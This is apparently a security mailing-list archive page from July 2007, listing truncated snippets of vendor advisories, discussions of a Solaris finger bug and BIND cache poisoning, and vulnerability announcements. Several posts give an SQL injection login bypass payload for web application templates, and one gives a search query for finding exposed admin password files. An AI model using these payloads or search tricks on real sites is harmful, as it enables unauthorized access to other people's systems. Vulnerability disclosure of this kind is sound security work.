FLEA-2007-0035-1: libvorbis

2007-07-28 Thread Foresight Linux Essential Announcement Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0035-1 Published: 2007-07-27 Rating: Moderate Updated Versions: libvorbis=/[EMAIL PROTECTED]:devel//1/1.2.0-0.1-1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3.2-0.6-4 References: http://cve.mitre.

Solaris finger bug

2007-07-28 Thread Jim Mellander
Hi all: Recently, we monitored a cracker from Eastern Europe, who ran 'finger [EMAIL PROTECTED]' against a Solaris 7 box, and got the following result: Login Name TTY Idle When Where daemon ??? < . . . . > bin ??? pts/1 xxx.lbl.g

Re: "BIND 9 DNS Cache Poisoning" by Amit Klein (Trusteer)

2007-07-28 Thread Amit Klein
I'm put in an awkward position of having to respond to a message which wasn't sent to me in the first place. But still... "This bug was reported over and over again" - I find this statement confusing. The bug class of "DNS transaction ID not being random enough" was sure reported for several D

Re: Solaris finger bug

2007-07-28 Thread Joep Vesseur
Jim Mellander wrote: Does anyone know of other platforms which exhibit this odd behavior? No, I think this is a Solaris-particular bug. I'd suggest blocking finger requests to these old[1] hosts, or turning off the finger daemon altogether... Joep [1] After all, Solaris 7 is from '98...

Berthanas Ziyaretci Defteri v2.0 (tr) Sql

2007-07-28 Thread yollubunlar
Olmek Var$a Kaderde Dert Ekleme Derdine Team :) ### Portal: Berthanas Ziyaretci Defteri v2.0 (tr) Sql Injection Bug Author: Yollubunlar http://yollubunlar.org ##

WebStore - Online Store Application Template SQL INJECTION

2007-07-28 Thread Advisory
__ A R I A - S E C U R I T Y _ WebStore - Online Store Application Template SQL INJECTION Vendor: http://www.codewidgets.com http://target.com/PATH/sign_in.aspx Username: admin Password: anything' OR 'x'='x Credits: Aria-Security Team http://aria

Real Estate listing website application template SQL Injection

2007-07-28 Thread Advisory
__ A R I A - S E C U R I T Y __ Real Estate listing website application template SQL Injection Vendor: http://www.codewidgets.com Username: admin Password: anything' OR 'x'='x Credits: Aria-Security Team http://aria-security.net http://outlaw.aria

Pay Roll - Time Sheet and Punch Card Application With Web Interface SQL Injection

2007-07-28 Thread Advisory
__ A R I A - S E C U R I T Y _ Pay Roll - Time Sheet and Punch Card Application With Web Interface SQL Injection Vendor: http://www.codewidgets.com http://target.com/PATH/login.asp Username: admin Password: anything' OR 'x'='x Credits: Aria-Secu

Message Board / Threaded Discussion Forum SQL INJECTION

2007-07-28 Thread Advisory
__ A R I A - S E C U R I T Y _ Message Board / Threaded Discussion Forum SQL INJECTION Vendor: http://www.codewidgets.com http://target.com/PATH/sign_in.aspx Username: admin Password: anything' OR 'x'='x Credits: Aria-Security Team http://aria-se

PHPBlogger cookie privilege escalation

2007-07-28 Thread darthballsbr
PHPBlogger is a simple tool to help the creation of web blogs... Encrypted admin password and other preferences are stored on /data/pref.db You can find lots of them exposed with google search: pref password= filetype:db =] The admin panel is acessib

phpCoupon Vulnerabilities

2007-07-28 Thread hack2prison
Discovered by freeprotect.net member Vendor site: http://phpcoupon.com phpCoupon is developed to provide affordable and easy-to-operate local coupon websites for local and niche directory owners and entrepreneurs seeking income opportunities. It has a securi

TSLSA-2007-0023 - multi

2007-07-28 Thread Trustix Security Advisor
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Trustix Secure Linux Security Advisory #2007-0023 Package names: bind, clamav, curl, mod_perl, perl-net-dns, php, tcpdump Summary: Multiple vulnerabilities Date

Re: Anti XSS AJAX

2007-07-28 Thread Ronald Chmara
On Jul 26, 2007, at 2:28 AM, Fady Anwar wrote: A white paper about how to counter attack XSS attacks using AJAX programming techniques http://barmagy.com/blogs/infinite_loop/archive/2007/07/20/498.aspx Failed assumptions = Flawed solutions. Signing

SuskunDuygular - Üyelik Sistemi v.1 Sql

2007-07-28 Thread yollubunlar
### Olmek Var$a Kaderde Dert Ekleme Derdine Team :) ### Portal: SuskunDuygular - Üyelik Sistemi v.1 Sql Injection Bug Author: Yollubunlar http://

WebEvents: Online Event Registration Template Username Fields SQL INJECTION

2007-07-28 Thread Advisory
__ A R I A - S E C U R I T Y _ WebEvents: Online Event Registration Template Username Field SQL Injection Vendor: http://www.codewidgets.com http://target.com/PATH/sign_in.aspx Username: admin Password: anything' OR 'x'='x Credits: Aria-Security

[ GLSA 200707-12 ] VLC media player: Format string vulnerabilities

2007-07-28 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200707-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -

Friend Script 2.5 - 2.4 Remote File Include

2007-07-28 Thread yollubunlar
### Olmek Var$a Kaderde Dert Ekleme Derdine Team :) ### Portal: Friend Script 2.5 - 2.4 Remote File Include Vulnerable Author: Yollubunlar http:/

[ GLSA 200707-13 ] Fail2ban: Denial of Service

2007-07-28 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200707-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -